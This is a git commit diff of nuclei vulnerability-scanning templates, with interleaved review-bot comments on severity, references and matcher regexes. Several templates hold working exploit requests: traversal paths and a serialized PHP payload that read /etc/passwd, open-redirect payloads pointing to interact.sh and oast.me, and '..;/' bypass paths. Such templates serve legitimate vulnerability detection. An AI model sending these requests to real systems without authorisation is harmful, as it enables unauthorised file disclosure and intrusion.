
Commit

20240826
actions-user committed Aug 26, 2024
1 parent 2eb80d1 commit 6f9452e
Showing 29 changed files with 503 additions and 600 deletions.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240825
20240826
19 changes: 9 additions & 10 deletions poc/cve/cve-2008-5587.yaml
@@ -1,28 +1,27 @@
id: CVE-2008-5587

info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
classification:
cve-id: CVE-2008-5587
reference: https://www.exploit-db.com/exploits/7363

metadata:
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2008,lfi,phppgadmin
shodan-query: 'http.title:"phpPgAdmin"'
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."

requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
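Review bot: the regex matcher `root:[x*]:0:0` in this file's matchers block uses a character class, so it only matches when the password field is exactly one `x` or `*`; a typical shadowed entry `root:x:0:0` passes, but an entry such as `root:!:0:0` or one with an inline hash does not, and every other template in this commit spells the same check as `root:.*:0:0`. Suggest aligning on `"root:.*:0:0"` so the match does not depend on the password-field form. The `reference` field also appears once as a single scalar (`reference: https://www.exploit-db.com/exploits/7363`) and once as a list; whichever side is retained, the list form is the one that keeps the three archived advisories, and the scalar form drops them.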
22 changes: 8 additions & 14 deletions poc/cve/cve-2009-1151.yaml
@@ -1,21 +1,15 @@
id: CVE-2009-1151

info:
name: PhpMyAdmin Scripts - Remote Code Execution
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: critical
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
severity: high
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: cve,cve2009,phpmyadmin,rce,deserialization,kev


requests:
- raw:
- |
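Review bot: the two sides of this hunk disagree on severity (`critical` versus `high`), and one side drops the entire classification block (cvss-metrics, `cvss-score: 10`, cve-id, cwe-id). The CVSS:3.0 vector shown scores 10.0, which is critical under the v3 bands, so whichever side is kept should carry a severity consistent with that score rather than `severity: high` with no classification data at all. Removing `classification` also removes the `cve-id` field that tooling uses to correlate the template with the CVE independently of the filename.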
Expand All @@ -26,13 +20,13 @@ requests:
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: regex
regex:
- "root:.*:0:0:"

# Enhanced by mp on 2022/07/06
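Review bot: the matcher in this hunk requires both a 200 status and a `root:.*:0:0:` line, but the raw request's first lines (method, path, Host header) sit in the collapsed region above it, so nothing visible ties the POST carrying `action=test&configuration=...` to the setup script's path; expand that region before approving so the full request is reviewed. The trailing-colon form `root:.*:0:0:` is stricter than the `root:.*:0:0` used in cve-2008-5587.yaml in this same commit; either works, but one form should be used across the repository.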
11 changes: 8 additions & 3 deletions poc/cve/cve-2015-5354.yaml
@@ -1,26 +1,31 @@
id: CVE-2015-5354

info:
name: Novius OS 5.0.1-elche - Open Redirect
author: 0x_Akoko
severity: medium
description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
reference:
- https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
- https://vuldb.com/?id.76181
- https://nvd.nist.gov/vuln/detail/CVE-2015-5354
- http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
- https://nvd.nist.gov/vul n/detail/CVE-2015-5354
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-5354
cwe-id: CWE-601
tags: cve,cve2015,redirect,novius
tags: packetstorm,cve,cve2015,redirect,novius

requests:
- method: GET
path:
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'

matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

# Enhanced by mp on 2022/07/22
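Review bot: the reference entry `https://nvd.nist.gov/vul n/detail/CVE-2015-5354` contains a space inside the path and will not resolve; the correct `https://nvd.nist.gov/vuln/detail/CVE-2015-5354` is present on the other side of the hunk, so the side with the broken URL should not be merged as is. The packetstormsecurity.com reference likewise appears in both http and https form; keep the https one. The Location-header regex is anchored on `interact\.sh`, which matches the `redirect=http://interact.sh` payload, so request and matcher are consistent with each other.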
42 changes: 12 additions & 30 deletions poc/cve/cve-2017-14524.yaml
@@ -1,43 +1,25 @@
id: CVE-2017-14524

info:
name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect
name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect
author: 0x_Akoko
severity: medium
description: |
OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
remediation: |
Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator.
severity: low
description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks.
reference:
- https://seclists.org/fulldisclosure/2017/Sep/57
- https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
- https://nvd.nist.gov/vuln/detail/CVE-2017-14524
- http://seclists.org/fulldisclosure/2017/Sep/57
- https://github.com/ARPSyndicate/cvemon
- https://www.cvedetails.com/cve/CVE-2017-14524
- https://vuldb.com/?id.107201
tags: cve,cve2017,redirect,opentext
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-14524
cwe-id: CWE-601
epss-score: 0.00258
epss-percentile: 0.6357
cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: opentext
product: documentum_administrator
tags: cve2017,cve,redirect,opentext,seclists

http:
requests:
- method: GET
path:
- '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me'

- '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
part: header
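Review bot: `severity: low` on one side contradicts the classification's `cvss-score: 6.1` / `6.10` (the v3 bands put 6.1 at medium), and `http:` versus `requests:` is the current nuclei protocol key against the deprecated one, so the side that keeps `requests:` together with `severity: low` is a regression on both counts; that side also drops the `# digest:` signature line and the `cpe`, `epss-score`, `epss-percentile` and `metadata` fields. The padded score `6.10` should be written `6.1` as in the other templates. Payload and matcher are paired consistently on each side (`startat=//oast.me` with `oast\.me`, `startat=//example.com` with `example\.com`); the `part: header` key placed after the `regex:` list on the example.com side is valid YAML, but for readability it belongs before `regex:` as it is on the other side.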
16 changes: 7 additions & 9 deletions poc/cve/cve-2018-1271.yaml
@@ -1,20 +1,18 @@
id: CVE-2018-1271

info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: medium
description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
reference:
- https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
- https://pivotal.io/security/cve-2018-1271
- http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699
- https://access.redhat.com/errata/RHSA-2018:1320
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.90
cve-id: CVE-2018-1271
cwe-id: CWE-22
tags: cve,cve2018,spring,lfi,traversal
description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack."

requests:
- method: GET
path:
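Review bot: the substantive changes in this hunk are the `reference` field collapsing from a four-entry list to a single scalar, and the classification moving between `CVSS:3.1` / `5.9` and `CVSS:3.0` / `5.90`. The vector string should name the CVSS version the score was actually computed under, and the score should not carry a padded trailing zero (`5.9`), so it matches the format used elsewhere in this commit. The list form of `reference` keeps the pivotal.io advisory and the Red Hat erratum RHSA-2018:1320, which are the fix references for this CVE; suggest not merging the single-scalar side.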
14 changes: 7 additions & 7 deletions poc/cve/cve-2018-15473.yaml
@@ -1,28 +1,28 @@
id: CVE-2018-15473

info:
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
- https://bugs.debian.org/906236
- http://www.openwall.com/lists/oss-security/2018/08/15/5
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cvss-score: 5.3
cve-id: CVE-2018-15473
cwe-id: CWE-362


tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"

matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'

extractors:
- type: regex
regex:
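Review bot: the banner regex `SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)` decides vulnerability from the version string alone, so distribution builds that backport the fix without changing the 7.x banner will be reported as vulnerable; that is inherent to a banner check, and the description should say that the result is version inference rather than a confirmed enumeration oracle, so that triage treats it as a lead. On the diff itself, `cvss-score: 5.30` and `5.3` are the same value and the unpadded form should be kept, the list form of `reference` (the OpenBSD commit, the Debian bug and the oss-security post) is the side to retain, and the two blank lines before `tags:` should be removed.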
21 changes: 10 additions & 11 deletions poc/cve/cve-2018-15535.yaml
@@ -1,32 +1,31 @@
id: CVE-2018-15535

info:
name: Responsive FileManager < 9.13.4 - Directory Traversal
name: Responsive FileManager <9.13.4 - Local File Inclusion
author: daffainfo
severity: high
description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion.
reference:
- https://www.exploit-db.com/exploits/45271
- https://www.cvedetails.com/cve/CVE-2018-15535

- https://nvd.nist.gov/vuln/detail/CVE-2018-15535
- http://seclists.org/fulldisclosure/2018/Aug/34
- https://www.exploit-db.com/exploits/45271/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cvss-score: 7.5
cve-id: CVE-2018-15535
cwe-id: CWE-22

tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- "root:.*:0:0:"
- type: status
status:
- 200

# Enhanced by mp on 2022/07/07
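Review bot: the second description is ungrammatical: "because it does not properly neutralize get_file sequences such as ".." can resolve to a location..." has no subject for "can resolve". If that side is kept, reword it to something like "it does not properly neutralize sequences such as '..' in the get_file action, which can resolve to a location outside that directory". The stray blank line inside the reference list should go, and the exploit-db.com entry appears both with and without a trailing slash, so keep one. The `root:.*:0:0` and `root:.*:0:0:` regex variants are equivalent in effect here; pick the form used repository-wide.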
78 changes: 12 additions & 66 deletions poc/exposed/exposed-swagger.yaml
Expand Up @@ -13,73 +13,19 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/swagger/"
- "{{BaseURL}}/swagger/index.html"
- "{{BaseURL}}/swagger-ui/index.html"
- "{{BaseURL}}/swagger-ui.html"
- "{{BaseURL}}/api/"
- "{{BaseURL}}/api/docs"
- "{{BaseURL}}/api-doc"
- "{{BaseURL}}/api-docs"
- "{{BaseURL}}/docs/index.html"
- "{{BaseURL}}/docs/"
- "{{BaseURL}}/docs/swagger-ui.html"
- "{{BaseURL}}/api/swagger-ui.html"
- "{{BaseURL}}/swagger/ui/index.html"
- "{{BaseURL}}/swagger/ui/index"
- "{{BaseURL}}/api/swagger/index.html"
- "{{BaseURL}}/api/swagger/ui/index"
- "{{BaseURL}}/api/swagger-ui/index.html"
- "{{BaseURL}}/api/docs/index.html"
- "{{BaseURL}}/api/doc/index.html"
- "{{BaseURL}}/api/index.html"
- "{{BaseURL}}/api/v1/swagger/index.html"
- "{{BaseURL}}/api/v1/swagger-ui/index.html"
- "{{BaseURL}}/api/v1/swagger/ui/index"
- "{{BaseURL}}/api/v1/docs/index.html"
- "{{BaseURL}}/api/v1/docs/swagger-ui/index.html"
- "{{BaseURL}}/api/v1/docs/swagger/index.html"
- "{{BaseURL}}/api/v2/swagger/index.html"
- "{{BaseURL}}/api/v2/docs/swagger-ui/index.html"
- "{{BaseURL}}/api/v2/docs/swagger/index.html"
- "{{BaseURL}}/api/v2/swagger-ui/index.html"
- "{{BaseURL}}/api/v2/swagger/ui/index"
- "{{BaseURL}}/api/v2/docs/index.html"
- "{{BaseURL}}/api/v3/swagger/index.html"
- "{{BaseURL}}/api/v3/swagger-ui/index.html"
- "{{BaseURL}}/api/v3/docs/swagger-ui/index.html"
- "{{BaseURL}}/api/v3/docs/swagger/index.html"
- "{{BaseURL}}/api/v3/swagger/ui/index"
- "{{BaseURL}}/api/v3/docs/index.html"
- "{{BaseURL}}/docs/swagger-ui/index.html"
- "{{BaseURL}}/v1/swagger/index.html"
- "{{BaseURL}}/v1/api"
- "{{BaseURL}}/v1/swagger-ui/index.html"
- "{{BaseURL}}/v1/swagger/ui/index"
- "{{BaseURL}}/v1/docs/index.html"
- "{{BaseURL}}/v1/api-docs/index.html"
- "{{BaseURL}}/v2/swagger/index.html"
- "{{BaseURL}}/v2/api"
- "{{BaseURL}}/v2/api-docs/index.html"
- "{{BaseURL}}/v2/swagger-ui/index.html"
- "{{BaseURL}}/v2/swagger/ui/index"
- "{{BaseURL}}/v2/docs/index.html"
- "{{BaseURL}}/v3/swagger/index.html"
- "{{BaseURL}}/v3/api-docs/index.html"
- "{{BaseURL}}/v3/swagger-ui/index.html"
- "{{BaseURL}}/v3/api"
- "{{BaseURL}}/v3/swagger/ui/index"
- "{{BaseURL}}/v3/docs/index.html"
- "{{BaseURL}}/"
- "{{BaseURL}}/doc/"
- "{{BaseURL}}/v0/"
- "{{BaseURL}}/v1/"
- "{{BaseURL}}/v2/"
- "{{BaseURL}}/v3/"
- "{{BaseURL}}/api/schema/swagger-ui/"

- "{{BaseURL}}/swagger/..;/swagger/index.html"
- "{{BaseURL}}/swagger-ui/..;/swagger-ui/index.html"
- "{{BaseURL}}/api/..;/api/"
- "{{BaseURL}}/api/..;/api/docs/"
- "{{BaseURL}}/api-doc/..;/api-doc"
- "{{BaseURL}}/api-docs/..;/api-docs"
- "{{BaseURL}}/docs/..;/docs/index.html"
- "{{BaseURL}}/api/..;/api/swagger-ui.html"
- "{{BaseURL}}/swagger/..;/swagger/ui/index"
- "{{BaseURL}}/api/..;/api/swagger/index.html"
- "{{BaseURL}}/v1/..;/v1/"

matchers:
- type: word
words:
- "Swagger UI"
- "swagger-ui-"
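Review bot: this hunk replaces the full set of plain Swagger paths (`/swagger/`, `/swagger-ui.html`, `/api-docs`, `/v2/api-docs/index.html` and the rest) with only eleven `..;/` variants such as `{{BaseURL}}/swagger/..;/swagger/index.html`. The `..;/` segment is a path-parameter normalisation quirk of Java servlet containers, so on any other server these URLs either return 404 or are normalised away, and a Swagger UI that is directly reachable at `/swagger-ui.html` is no longer detected at all. Suggest keeping the original list and appending the `..;/` variants instead of swapping one for the other; the `Swagger UI` / `swagger-ui-` word matcher works unchanged for both sets.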
2 changes: 1 addition & 1 deletion poc/java/spring-functions-rce.yaml
Expand Up @@ -18,7 +18,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22963
cwe-id: CWE-94
tags: vulhub,cve,cve2022,springcloud,rce,kev
tags: cve,cve2022,springcloud,rce

requests:
- raw:
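Review bot: the tags line loses `vulhub` and `kev`. CVE-2022-22963 is listed in CISA's Known Exploited Vulnerabilities catalog, and the `kev` tag is what `nuclei -tags kev` keys on when prioritising known-exploited checks, so the side without it should not be merged; dropping `vulhub` likewise breaks `-tags vulhub` runs against the matching lab environment.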